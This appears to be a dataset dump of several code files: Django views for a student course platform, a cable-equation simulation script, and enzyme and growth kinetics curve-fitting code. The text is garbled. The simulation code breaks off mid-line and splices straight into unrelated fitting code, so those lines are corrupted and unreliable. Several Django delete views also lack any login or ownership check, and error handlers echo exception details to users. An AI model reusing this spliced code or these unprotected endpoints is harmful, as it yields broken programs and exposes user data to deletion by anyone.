lecture_slug, warning_message)\n\n\nclass DeleteAssignmentView(View):\n def post(self, request, course_slug, lecture_slug, a_id, *args, **kwarg):\n cursor = connection.cursor()\n\n cursor.execute('select lecture_no from courses_lecture where lecture_slug = %s;', [lecture_slug])\n lecture_no_row = cursor.fetchone()\n if not lecture_no_row:\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n lecture_no = lecture_no_row[0]\n\n cursor.execute('DELETE FROM main_assignment WHERE assignmentno = %s AND lecture_no_id = %s',\n [a_id, lecture_no])\n\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n\nclass DeleteLectureMaterialView(View):\n def post(self, request, course_slug, lecture_slug, lm_id, *args, **kwarg):\n cursor = connection.cursor()\n\n cursor.execute('select lecture_no from courses_lecture where lecture_slug = %s;', [lecture_slug])\n lecture_no_row = cursor.fetchone()\n if not lecture_no_row:\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n lecture_no = lecture_no_row[0]\n\n cursor.execute('DELETE FROM courses_lecturematerial WHERE materialno = %s AND lecture_no_id = %s',\n [lm_id, lecture_no])\n\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n\nclass DeleteAnnouncementView(View):\n def post(self, request, course_slug, lecture_slug, ann_id, *args, **kwarg):\n cursor = connection.cursor()\n\n cursor.execute('select cno from courses_course where slug = %s;', [course_slug])\n cno_row = cursor.fetchone()\n if not cno_row: # no course with this course slug (i.e. URL)\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug) # return to main page\n cno = cno_row[0]\n\n cursor.execute('DELETE FROM main_announcement WHERE ann_id = %s AND cno_id = %s', [ann_id, cno])\n\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n\nclass DeleteNoteView(View):\n def post(self, request, course_slug, lecture_slug, note_id, *args, **kwarg):\n cursor = connection.cursor()\n\n cursor.execute('DELETE FROM main_takes_note WHERE note_id = %s;', [note_id])\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n\nclass DeleteQuestionView(View):\n def post(self, request, course_slug, lecture_slug, q_id, *args, **kwarg):\n cursor = connection.cursor()\n\n cursor.execute('DELETE FROM main_quest_answ WHERE question_no_id = %s;''', [q_id])\n\n cursor.execute('DELETE FROM main_post WHERE postno = %s;', [q_id])\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n\nclass DeleteAnswerView(View):\n def post(self, request, course_slug, lecture_slug, a_id, *args, **kwarg):\n cursor = connection.cursor()\n\n cursor.execute('DELETE FROM main_quest_answ WHERE answer_no_id = %s;''', [a_id])\n\n cursor.execute('DELETE FROM main_post WHERE postno = %s;', [a_id])\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + lecture_slug)\n\n\nclass CourseCertificateView(View):\n def get(self, request, course_slug, *args, **kwargs):\n if not request.user.id:\n return HttpResponseRedirect(\"/login\")\n\n cursor = connections['default'].cursor()\n\n course_queue = Course.objects.raw('''SELECT * FROM courses_course WHERE slug = %s;''', [course_slug])\n\n curuser_id = request.user.id\n print(curuser_id)\n\n cursor.execute('''SELECT username,first_name, last_name FROM auth_user WHERE id = %s''', [curuser_id])\n user = cursor.fetchone()\n username = user[0]\n first_name = user[1]\n last_name = user[2]\n print(\"certificate username:\", username, first_name, last_name)\n \"\"\"\n img = Image.new('RGB', (100, 30), color=(73, 109, 137))\n \n d = ImageDraw.Draw(img)\n d.text((10, 10), \"Hello World\", fill=(255, 255, 0))\n \n canvas = Canvas(\"certificate.pdf\")\n canvas.drawString(72, 72, \"Congratulations\")\n canvas.save()\n \"\"\"\n if len(course_queue) > 0:\n course = course_queue[0]\n else:\n # 404 error\n return HttpResponseRedirect('/')\n\n finish_list = Finishes.objects.raw(\n '''SELECT * FROM main_finishes as MF WHERE MF.cno_id = %s AND MF.user_id = %s;''',\n [course.cno, curuser_id])\n\n if (not finish_list):\n return HttpResponseRedirect(\"/\" + course_slug)\n\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select * from main_topic;')\n\n context = {\n 'courseurl': '/' + course_slug,\n 'curcourse': course,\n 'user': curuser_id,\n 'username': username,\n 'first_name': first_name,\n 'last_name': last_name,\n 'user_type': user_type,\n 'topic_list': topic_list,\n 'course_slug': course_slug,\n #'pdf': canvas\n }\n cursor.close()\n\n return render(request, 'certificate.html', context)\n\n\nclass CourseFinishView(View):\n def get(self, request, course_slug, *args, **kwargs):\n\n if not request.user.id:\n return HttpResponseRedirect(\"/login\")\n\n cursor = connections['default'].cursor()\n\n course_queue = Course.objects.raw('''SELECT * FROM courses_course WHERE slug = %s;''', [course_slug])\n\n curuser_id = request.user.id\n print(curuser_id)\n\n cursor.execute('''SELECT username FROM auth_user WHERE id = %s''', [curuser_id])\n username = cursor.fetchone()[0];\n\n if len(course_queue) > 0:\n course = course_queue[0]\n else:\n # 404 error\n return HttpResponse(\"No course as stated. Return to main page.\")\n\n finish_list = Finishes.objects.raw(\n '''SELECT * FROM main_finishes as MF WHERE MF.cno_id = %s AND MF.user_id = %s;''',\n [course.cno, curuser_id])\n\n if (not finish_list):\n return HttpResponseRedirect(\"/\" + course_slug)\n finish_list = Finishes.objects.raw(\n '''SELECT * FROM main_finishes as MF WHERE MF.cno_id = %s AND MF.user_id = %s;''',\n [course.cno, curuser_id])\n currate = finish_list[0].score\n curcomment = finish_list[0].comment\n\n comment = FinishCourseCommentForm()\n rate = FinishCourseRateForm()\n\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select * from main_topic;')\n\n context = {\n 'currate': currate,\n 'curcomment': curcomment,\n 'url': '/' + course_slug + '/finish',\n 'curcourse': course,\n 'user': curuser_id,\n 'username': username,\n 'user_type': user_type,\n 'topic_list': topic_list,\n 'form': rate,\n 'course_slug': course_slug,\n }\n cursor.close()\n return render(request, 'courses/coursefinish.html', context)\n\n def post(self, request, course_slug, *args, **kwargs):\n cursor = connection.cursor()\n\n # cursor.execute('select lecture_no from courses_lecture where lecture_slug = %s;', [lecture_slug])\n course_queue = Course.objects.raw('''SELECT * FROM courses_course WHERE slug = %s;''', [course_slug])\n\n curuser_id = request.user.id\n print(curuser_id)\n\n if len(course_queue) > 0:\n course = course_queue[0]\n else:\n # 404 error\n print(\"error no course as the stated\");\n form_comment = FinishCourseCommentForm(request.POST)\n\n if form_comment.is_valid():\n comment = form_comment.cleaned_data['comment']\n print(\"Comment: \", comment)\n cursor.execute('UPDATE main_finishes SET comment = %s where cno_id = %s AND user_id = %s;',\n [comment, course.cno, curuser_id])\n\n form_rate = FinishCourseRateForm(request.POST)\n print(\"form_rate: \", form_rate)\n\n if form_rate.is_valid():\n rate_s = form_rate.cleaned_data.get(\"rate\")\n print(\"Rate: \", rate_s)\n if rate_s == 'one':\n rate = 1\n elif rate_s == 'two':\n rate = 2\n elif rate_s == 'three':\n rate = 3\n elif rate_s == 'four':\n rate = 4\n elif rate_s == 'five':\n rate = 5\n cursor.execute('UPDATE main_finishes SET score = %s where cno_id = %s AND user_id = %s;',\n [int(rate), course.cno, curuser_id])\n cursor.close()\n\n return HttpResponseRedirect(request.path)\n\n\nclass AddComplainView(View):\n template_name = \"main/complain.html\"\n course_slug = \"\"\n\n def get(self, request, course_slug):\n form = ComplainForm()\n self.course_slug = course_slug\n if request.user.is_authenticated: # we need to check enrollments as well\n cursor = connection.cursor()\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select * from main_topic;')\n\n return render(request, self.template_name, {'form': form,\n 'user_type': user_type,\n 'topic_list': topic_list, })\n warning_message = \"You need to log in\"\n return LoginView.get(self, request, warning_message)\n\n def post(self, request, course_slug):\n cursor = connection.cursor()\n self.course_slug = course_slug\n course_q = Course.objects.raw('select * '\n 'from courses_course '\n 'where slug = %s;',\n [self.course_slug])\n course = course_q[0]\n course_cno = course.cno\n\n form = ComplainForm(request.POST)\n if form.is_valid():\n description = form.cleaned_data['description']\n cursor.execute('insert into main_complaint (creation_date, description, course_id, s_user_id) '\n 'values (curdate(), %s, %s, %s);',\n [description, course_cno, request.user.id])\n cursor.close()\n return render(request, \"trivial/success_message_after_submitting.html\",\n {'success_message': 'Your refund request has been sent to the administrators. '\n 'You will get an answer in approximately a week. Please be patient.',\n 'course_slug': course_slug})\n cursor.close()\n return HttpResponseRedirect('/')\n\n\nclass RefundRequestView(View):\n template_name = \"main/refund.html\"\n course_slug = \"\"\n\n def get(self, request, course_slug):\n form = ComplainForm()\n self.course_slug = course_slug\n if request.user.is_authenticated: # we need to check enrollments as well\n cursor = connection.cursor()\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select * from main_topic;')\n\n return render(request, self.template_name, {'form': form,\n 'user_type': user_type,\n 'topic_list': topic_list, })\n return HttpResponseRedirect('/')\n\n def post(self, request, course_slug):\n cursor = connection.cursor()\n self.course_slug = course_slug\n course_q = Course.objects.raw('select * '\n 'from courses_course '\n 'where slug = %s;',\n [self.course_slug])\n course = course_q[0]\n course_cno = course.cno\n\n form = ComplainForm(request.POST)\n if form.is_valid():\n description = form.cleaned_data['description']\n cursor.execute('INSERT INTO main_refundrequest (reason, status, cno_id, s_username_id, date) '\n 'VALUES (%s, %s, %s, %s, curdate());',\n [description, 0, course_cno, request.user.id])\n cursor.close()\n return render(request, \"trivial/success_message_after_submitting.html\",\n {'success_message': 'Your refund request has been sent to the administrators. '\n 'You will get an answer in approximately a week. Please be patient.',\n 'course_slug': course_slug})\n cursor.close()\n return HttpResponseRedirect('/')\n\n\ndef make_slug_for_url(name, for_course=True):\n orig_slug = slugify(name)\n\n # check for the existence of the same slug below so that the slug is unique\n unique = False\n uniquifier = 1\n slug = orig_slug\n while not unique:\n cursor = connection.cursor()\n if for_course:\n cursor.execute('select count(*) from courses_course where slug = %s;', [orig_slug])\n else:\n cursor.execute('select count(*) from courses_lecture where lecture_slug = %s;', [orig_slug])\n count = cursor.fetchone()\n\n if count:\n count = count[0]\n\n cursor.close()\n if count != 0:\n orig_slug = slug + '-' + str(uniquifier)\n print(\"Result slug: \", orig_slug)\n uniquifier += 1\n else:\n unique = True\n\n return orig_slug\n\n\nclass AddCourseView(View):\n template_name = \"courses/add_course.html\"\n\n def get(self, request):\n if not request.user.is_authenticated:\n return HttpResponseRedirect('/')\n cursor = connection.cursor()\n\n cursor.execute('select count(*) '\n 'from accounts_instructor '\n 'where student_ptr_id = %s;', [request.user.id])\n is_instructor = cursor.fetchone()\n\n if is_instructor:\n is_instructor = is_instructor[0]\n\n cursor.close()\n\n if is_instructor == 0: # this means that there is no instructor with the requested id\n return HttpResponseRedirect('/') # TODO: A page to transform student into instructor\n\n form = CreateCourseForm()\n\n cursor = connection.cursor()\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select * from main_topic order by topicname;')\n\n return render(request, self.template_name, {'user_type': user_type,\n 'form': form,\n 'add_message': 'Add a course as an instructor:',\n 'create_button': 'Create a course!',\n 'topic_list': topic_list})\n\n def post(self, request):\n form = CreateCourseForm(request.POST, request.FILES)\n\n if form.is_valid():\n cname = form.cleaned_data['cname']\n price = form.cleaned_data['price']\n topics = form.cleaned_data.get('topic')\n thumbnail = form.cleaned_data['course_img']\n\n description = form.cleaned_data['description']\n private = form.cleaned_data['private']\n\n orig_slug = make_slug_for_url(cname)\n\n cursor = connection.cursor()\n try:\n cursor.execute('insert into courses_course (cname, price, slug, is_private, course_img, '\n 'description, owner_id) VALUES (%s, %s, %s, %s, %s, %s, %s);',\n [cname, price, orig_slug, private, thumbnail, description, request.user.id])\n finally:\n cursor.close()\n\n cursor = connection.cursor()\n try:\n cursor.execute('select cno from courses_course where cname = %s;', [cname])\n cno = cursor.fetchone()\n\n if cno:\n cno = cno[0]\n\n for topic in topics:\n cursor.execute('insert into main_course_topic (cno_id, topicname_id) VALUES (%s, %s);',\n [cno, topic])\n except Error:\n return HttpResponse(\"There was an error.

    \" + str(sys.exc_info()))\n finally:\n cursor.close()\n\n warning_message = \"Success: Course submission is successful.\"\n return MainView.get(self, request, warning_message)\n\n\nclass AddLectureToCourseView(View):\n template_name = \"courses/add_course.html\"\n\n def get(self, request, course_slug):\n cursor = connection.cursor()\n cursor.execute('select owner_id, cname, cno from courses_course where slug = %s;', [course_slug])\n cno_row = cursor.fetchone()\n cursor.close()\n if not cno_row: # no course with this course slug (i.e. URL)\n warning_message = \"No course with this name\"\n return MainView.get(self, request, warning_message)\n\n owner_id = cno_row[0]\n cname = cno_row[1]\n cno = cno_row[2]\n # if the owner is not the user logging in, return to main page\n if request.user.id != owner_id:\n warning_message = \"You cannot access this page\"\n return MainView.get(self, request, warning_message)\n\n cursor = connection.cursor()\n cursor.execute('select is_complete from courses_course where cno = %s;', [cno])\n is_complete = cursor.fetchone()[0]\n if is_complete == 1:\n warning_message = \"Error: You cannot add any more lectures to this course. The course is marked as complete.\"\n return CourseDetailView.get(self, request, warning_message)\n\n message = 'Add a lecture to ' + cname\n\n form = CreateLectureForm()\n\n cursor = connection.cursor()\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select * from main_topic order by topicname;')\n\n return render(request, self.template_name, {'user_type': user_type, 'form': form, 'add_message': message,\n 'create_button': 'Create a lecture!',\n 'topic_list': topic_list, })\n\n def post(self, request, course_slug):\n cursor = connection.cursor()\n cursor.execute('select cno from courses_course where slug = %s;', [course_slug])\n cno_row = cursor.fetchone()\n cursor.close()\n if not cno_row: # no course with this course slug (i.e. URL)\n return HttpResponseRedirect('/') # return to main page\n cno = cno_row[0]\n\n form = CreateLectureForm(request.POST)\n\n if form.is_valid():\n lecture_name = form.cleaned_data['lecture_name']\n lecture_url = form.cleaned_data['lecture_url']\n\n lecture_slug = make_slug_for_url(lecture_name, for_course=False)\n\n cursor = connection.cursor()\n cursor.execute('INSERT INTO courses_lecture (lecture_name, lecture_slug, video_url, cno_id) VALUES '\n '(%s, %s, %s, %s);', [lecture_name, lecture_slug, lecture_url, cno])\n\n warning_message = \"Success: Lecture submission is successful.\"\n return CourseDetailView.get(self, request, course_slug, warning_message)\n\n\nclass ChangeCourseSettingsView(View):\n template_name = \"courses/course_edit.html\"\n\n def check_validity(self, course_slug):\n cursor = connection.cursor()\n cursor.execute('select cno from courses_course where slug = %s;', [course_slug])\n cno_row = cursor.fetchone()\n if not cno_row: # this means that the course does not exist\n return -1\n cno = cno_row[0]\n\n cursor.execute('select course_topic_id, topicname_id from main_course_topic where cno_id = %s;', [cno])\n course_topic_id = cursor.fetchone()\n\n if course_topic_id:\n course_topic_id = course_topic_id[0]\n\n cursor.close()\n\n return cno, course_topic_id\n\n def get(self, request, course_slug, warning_message = None):\n if request.user.is_authenticated: # if the user has logged in\n cno_course_topic_id = self.check_validity(course_slug)\n\n if cno_course_topic_id == -1:\n return HttpResponseRedirect('/')\n cno, course_topic_id = cno_course_topic_id[0], cno_course_topic_id[1]\n\n course = Course.objects.raw('select * from courses_course where cno = %s;', [cno])[0]\n if course.owner_id != request.user.id:\n return HttpResponseRedirect('/')\n\n course_form = EditCourseForm(instance=course)\n\n cursor = connection.cursor()\n try:\n cursor.execute('select user_type from auth_user where id = %s;', [request.user.id])\n user_type = cursor.fetchone()\n\n if user_type:\n user_type = user_type[0]\n\n finally:\n cursor.close()\n\n cursor = connection.cursor()\n\n cursor = connection.cursor()\n cursor.execute('''SELECT U.username \n FROM main_contributor AS MC,auth_user AS U\n WHERE MC.cno_id = %s AND MC.user_id = U.id;''', [cno])\n\n contributor_list = cursor.fetchall()\n contributors = [None] * len(contributor_list)\n for i in range(0, len(contributors)):\n contributors[i] = contributor_list[i][0]\n print(contributor_list[i][0])\n\n cursor.close()\n\n contributor_form = AddContributorForm()\n\n topic_list = Topic.objects.raw('select * from main_topic;')\n\n return render(request, self.template_name, {'course_form': course_form, 'course': course,\n 'user_type': user_type, 'topic_list': topic_list,\n 'course_slug': course_slug, 'contributors': contributors,\n 'warning_message': warning_message})\n return HttpResponseRedirect('/')\n\n def post(self, request, course_slug):\n cno_course_topic_id = self.check_validity(course_slug)\n\n if cno_course_topic_id == -1:\n return HttpResponseRedirect('/')\n cno, course_topic_id = cno_course_topic_id[0], cno_course_topic_id[1]\n course_form = EditCourseForm(request.POST, request.FILES,\n instance=Course.objects.raw('select * from courses_course where cno = %s;',\n [cno])[0])\n if course_form.is_valid():\n cname = course_form.cleaned_data['cname']\n price = course_form.cleaned_data['price']\n course_img = course_form.cleaned_data['course_img']\n description = course_form.cleaned_data['description']\n private = course_form.cleaned_data['is_private']\n\n cursor = connection.cursor()\n cursor.execute('update courses_course '\n 'set cname = %s, price = %s, course_img = %s, description = %s, is_private = %s '\n 'where cno = %s;', [cname, price, course_img, description, private, cno])\n cursor.close()\n\n contributor_form = AddContributorForm(request.POST)\n cursor = connection.cursor()\n if contributor_form.is_valid():\n contributor_username = contributor_form.cleaned_data['addcontributor']\n cursor.execute('SELECT id FROM auth_user, accounts_instructor WHERE username = %s AND student_ptr_id = id;', [contributor_username])\n c_id_list = cursor.fetchone()\n if (c_id_list == None):\n cursor.close()\n\n warning_message = \"There is no instructor with this username.\"\n return ChangeCourseSettingsView.get(self, request, course_slug, warning_message)\n c_id = c_id_list[0];\n\n cursor.execute('SELECT user_id FROM main_contributor WHERE cno_id = %s and user_id = %s;', [cno, c_id])\n if not cursor.fetchone():\n cursor.execute('INSERT INTO main_contributor(cno_id, user_id) VALUES( %s, %s); ',\n [cno, c_id])\n return HttpResponseRedirect('/' + course_slug + '/edit')\n\n cursor.close()\n return HttpResponseRedirect('/' + course_slug)\n\n\nclass DeleteContributerView(View):\n def post(self, request, course_slug, c_username, *args, **kwarg):\n\n cursor = connection.cursor()\n\n cursor.execute('select cno from courses_course where slug = %s;', [course_slug])\n cno_row = cursor.fetchone()\n if not cno_row: # no course with this course slug (i.e. URL)\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + edit) # return to main page\n cno = cno_row[0]\n\n cursor.execute('SELECT id FROM auth_user WHERE username = %s;', [c_username])\n c_id_list = cursor.fetchone()\n if (c_id_list == None):\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + edit)\n c_id = c_id_list[0];\n\n cursor.execute('DELETE FROM main_contributor WHERE cno_id = %s AND user_id = %s;', [cno, c_id])\n\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/edit\")\n\n\nclass OfferAdView(View):\n template_name = \"courses/offer_ad.html\"\n\n def get(self, request, course_slug):\n form = OfferAdForm()\n\n cursor = connection.cursor()\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select topicname from main_topic;')\n\n context = {'user_type': user_type,\n 'form': form,\n 'path': request.path,\n 'topic_list': topic_list,\n }\n\n return render(request, self.template_name, context)\n\n def post(self, request, course_slug):\n form = OfferAdForm(request.POST, request.FILES)\n if form.is_valid():\n ad_img = form.cleaned_data[\"ad_img\"]\n status = 0 # 0 for waiting, 1 for refused, 2 for accepted\n price = form.cleaned_data[\"price\"]\n startdate = form.cleaned_data[\"start_date\"]\n finishdate = form.cleaned_data[\"end_date\"]\n\n cursor = connection.cursor()\n cursor.execute('select cno from courses_course where slug = %s;', [course_slug])\n cno_row = cursor.fetchone()\n cursor.close()\n if not cno_row: # no course with this course slug (i.e. URL)\n return HttpResponseRedirect('/') # return to main page\n cno = cno_row[0]\n\n cursor = connection.cursor()\n cursor.execute('INSERT INTO main_advertisement (advertisement, status, payment, startdate, finishdate,'\n ' ad_username_id, cno_id) VALUES (%s, %s, %s, %s, %s, %s, %s);',\n [ad_img, status, price, startdate, finishdate, request.user.id, cno])\n cursor.close()\n return redirect(\"main:offers\")\n\n\ndef mark_as_complete(request, course_slug):\n if request.user.is_authenticated:\n # check for user type\n user_type = get_user_type(request)\n if user_type != 1: # not an instructor\n return HttpResponseRedirect('/')\n # check if the user is the owner\n cursor = connection.cursor()\n try:\n cursor.execute('select cno, owner_id from courses_course where slug = %s;', [course_slug])\n owner_row = cursor.fetchone()\n if not owner_row: # the course does not exist\n return HttpResponseRedirect('/')\n\n # checking for the owner themselves\n cno = owner_row[0] # will be useful in the update statement below\n owner_id = owner_row[1]\n if owner_id != request.user.id: # the user is not the owner\n return HttpResponseRedirect('/')\n\n # now we can finally mark the course as complete\n cursor.execute('update courses_course set is_complete = 1 where cno = %s;', [cno])\n response_str = '/' + course_slug\n return redirect(response_str)\n except Error:\n return HttpResponse(\"There was an error.

    \" + str(sys.exc_info()))\n finally:\n cursor.close()\n\n return HttpResponseRedirect('/')\n","repo_name":"isikozsoy/CS353_OnlineCoursePlatform_Group3","sub_path":"mayacat/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":63852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18881700034","text":"\"\"\"\n**IF THERE IS A FUNCTION YOU CAN'T FIND THE FUNCTION ITS PROBABLY PLACED IN THE UTILITIES**\n\"\"\"\n# Imports \nimport numpy as np\nfrom utilities import *\nimport os\nimport hh\n\n# Prints the arrays properly with elements as X.YYY\nnp.set_printoptions(precision=3)\n\n\ndef create_sheets():\n # A key observation from the cable equation implementation is that we have two sheets to represent the intracellular and extracellular space\n # The sheet will comprise of arrays of columns. Thus to get the actual sheet just call transpose on the sheet.\n n_rows = 10\n n_columns = 15\n # The intracellular space is initally at a potential of -70 mV\n intra = np.zeros([n_columns, n_rows ])\n intra += -70\n # The extracellular space is initally at a potential of 0 mV\n extra = np.zeros([n_columns, n_rows ])\n return intra, extra\n \ndef create_laplace_matrix(V, c):\n # Takes in either intra or extra flattens it then and makes the respective Laplacian\n flattened= flat(V)\n L = []\n size = len(flattened)\n # this is the number that changes according to the size of matrix (the m value of matrix) \n buffer_number = len(V[0])\n temp = []\n\n # The main diagonal\n for i in range(len(V)):\n for j in range(len(V[i])):\n # Three point stencil\n if (i==0 and j==0) or (i==(len(V)-1) and j==0) or (i==0 and j==(len(V[i])-1)) or (i==len(V)-1 and j==len(V[i])-1):\n temp.append(c*-2)\n # Four point stencil\n elif (0 set_mean[0]:\n set_mean = (np.mean(np.asarray(s)),i)\n #Make place holders for scaled data sets\n sxdata_sets = []\n sydata_sets = []\n syerr_sets = []\n #Having identified the dataset with the highest mean value itterate through other data sets and scale according to linear interpolation\n for i,s in enumerate(iydata_sets):\n #print(s)\n #If data set index is the same as that with the highest value do not need to scale so just append to list of scaled data sets and pass\n if i == set_mean[1]:\n sxdata_sets.append(ixdata_sets[i])\n sydata_sets.append(iydata_sets[i])\n syerr_sets.append(iyerr_sets[i])\n #Otherwise go through and scale values\n else:\n #To scale y data points with interpolation find values on eitherside of each in both x and y axis.\n #make a list of all scale factors\n s_factors = []\n #create place holder to scaled data sets\n sydata_set = []\n syerr_set = []\n #Itterating through data points in data set need to make sure that data sets are comparable\n for j,k in enumerate(ixdata_sets[i]):\n #make place holder for scale factor\n scale_factor = 1\n #check if x-axis value in data set with greatest mean value\n if k not in ixdata_sets[set_mean[1]]:\n #if value is not in data set with greatest mean value need to interpolate to find comparable y-axis value to determine scaling factor from\n #check that x-axis value is not larger than the largest value in data set with highest mean value\n if k < max(ixdata_sets[set_mean[1]]):\n #Itterate through data set with highest mean value and find values on either side\n for r,t in enumerate(ixdata_sets[set_mean[1]]):\n if t > k:\n x1 = ixdata_sets[set_mean[1]][r-1]\n x2 = ixdata_sets[set_mean[1]][r]\n y1 = iydata_sets[set_mean[1]][r-1]\n y2 = iydata_sets[set_mean[1]][r]\n #Having identified values on either side interpolate and determine scale factor\n scale_factor = (y1+((k-x1)*((y2-y1)/(x2-x1))))/iydata_sets[i][j]\n #print('i scale'+str(scale_factor))\n #append scale factor to list of scale factors\n s_factors.append((scale_factor,k))\n break\n else:\n #If the x point is outside that of the largest data set x axis range scale by the difference in maximum dataset mean average y value and the\n #mean average of the dataset considered\n scale_factor = set_mean[0]/np.mean(np.asarray(iydata_sets[i]))\n #print('over scale'+str(scale_factor))\n #having determined new scale factor then append to list of scale factors\n s_factors.append((scale_factor,k))\n #If do not need to interpolate to find value go directly ahead and calculate scale factor\n else:\n scale_factor = iydata_sets[set_mean[1]][j]/iydata_sets[i][j]\n #print('scale'+str(scale_factor))\n #append scale factor to list of scale factors\n s_factors.append((scale_factor,k))\n #having determined scale factor then want to scale value and append to scaled y axis list\n sydata_set.append(iydata_sets[i][j]*scale_factor)\n #Still need to scale y_err set\n #initially look up the percentage error associated with error in original data sets\n syerr_set.append((iyerr_sets[i][j]/iydata_sets[i][j])*(iydata_sets[i][j]*scale_factor))\n #having determined scale list then want to append list to lists of scaled data\n sxdata_sets.append(ixdata_sets[i])\n sydata_sets.append(sydata_set)\n syerr_sets.append(syerr_set)\n\n #Having scaled all datasets to use then return them\n return (sxdata_sets,sydata_sets,syerr_sets)\n\n#Function to estimate variables of menten and extended models\ndef comb_set(no_datasets,scale,xdata_sets,ydata_sets,yerr_sets,x0_replace,error):\n #Determine x and y axis data sets from individual or combined datasets\n #Initially consider if need to scale data\n if no_datasets != 1:\n if scale == 'Yes':\n #Scaling data to account for variation in y axis due to intercell variablilty in maximum production or growth rates\n sxdata,sydata,syerr = data_scalar(xdata_sets,ydata_sets,yerr_sets)\n #Combine and average scaled data sets\n xdata,ydata = avg_set(sxdata,sydata,x0_replace)\n if error == 'Yes':\n yerr = avg_set(sxdata,syerr,x0_replace)[1]\n #print(yerr)\n else:\n yerr = []\n pass\n else:\n xdata,ydata = avg_set(xdata_sets,ydata_sets,x0_replace)\n if error == 'Yes':\n yerr = avg_set(xdata_sets,yerr_sets,x0_replace)[1]\n #print(yerr)\n else:\n yerr = []\n pass\n else:\n xdata,ydata = avg_set(xdata_sets,ydata_sets,x0_replace)\n if error == 'Yes':\n yerr = avg_set(xdata_sets,yerr_sets,x0_replace)[1]\n #print(yerr)\n else:\n yerr = []\n pass\n #print(xdata)\n #print(ydata)\n return (xdata,ydata,yerr)\n\n#Function to determine number of steps between x points to plot, want to find average difference between x axis points\n#and then take number of steps equal to x_plotno between each x-axis point\ndef xsteps(xdata,x_plotno,xmin_plot,max_check,max_x):\n #Make list of xaxis differences\n xdif_lst = []\n for i in range(len(xdata)):\n #Want to stop look when difference between last two values has been found\n if i == len(xdata)-1:\n break\n else:\n #calculate difference between x points then append to list\n xdif_lst.append(abs(xdata[i+1]-xdata[i]))\n #convert list to numpy array and then calculate mean average before finding x_plotno of this difference\n xdif_avg = np.mean(np.array(xdif_lst))/x_plotno\n #Make xdif_avg is appropriate to capture smaller values\n if xdif_avg > xdata[1]:\n xdif_avg = xdata[1]\n else:\n pass\n #check if want to plot to maximum x_axis value or higher\n if max_check == 'Yes':\n xdata_plot = pd.Series(np.arange(xmin_plot,max(xdata),xdif_avg))\n else:\n xdata_plot = pd.Series(np.arange(xmin_plot,max_x,xdif_avg))\n\n return xdata_plot\n\n#Function to estimate menten emperical kenetic parameters\ndef esti_var(Estimated_var,ydata,xdata):\n #For Han and Luong need to to know Smin - this must be a value greater than the largest experimental x-axis value\n Smin = max(xdata)\n if Estimated_var == 'Yes':\n #Estimating variables used in fitting data to curve\n #Take mu or equivilant vmax as the maximum y axis data point\n mu = max(ydata)\n #As the real value to mu may be greater or smaller than the maximum experimental value set mu/vmax estimated bounds to be 10% either side of experimental value\n mu_min = mu - (0.1*mu)\n mu_max = mu + (0.1*mu)\n #Ks is half the concentration at which maximum rate occours to find KS initially find half of maximum rate\n #then determine list indices which either side of half maximum rate to retrieve from x data set\n for i,j in enumerate(ydata):\n if j > max(ydata)/2:\n if i == 0:\n Ks_max = xdata[i+1]\n Ks_min = xdata[i+1]*1e-13\n else:\n Ks_max = xdata[i]\n Ks_min = xdata[i-1]\n break\n if Ks_min == 0:\n Ks_min = 1e-15\n bounds = {'Menten':([mu_min,Ks_min],[mu_max,Ks_max]),'Inverse_Monod':([mu_min,Ks_min],[mu_max,Ks_max]),'exp_growth':([mu_min],[mu_max]),\n 'Han':([mu_min,Ks_min],[mu_max,Ks_max]),'Luong':([mu_min,Ks_min],[mu_max,Ks_max]),'Andrews':([mu_min,Ks_min],[mu_max,Ks_max]),'Aiba':([mu_min,Ks_min],[mu_max,Ks_max]),\n 'Moser':([mu_min,Ks_min],[mu_max,Ks_max]),'Edward':([mu_min,Ks_min],[mu_max,Ks_max]),'Webb':([mu_min,Ks_min],[mu_max,Ks_max]),'Yano':([mu_min,Ks_min],[mu_max,Ks_max]),\n 'Haldane':([mu_min,Ks_min],[mu_max,Ks_max])}\n\n #bounds = ([mu_min,Ks_min],[mu_max,Ks_max])\n else:\n bounds = {'Menten':([1e-18,1e-18],[np.inf,np.inf]),'Inverse_Monod':([1e-18,1e-18],[np.inf,np.inf]),'exp_growth':([1e-18],[np.inf]),\n 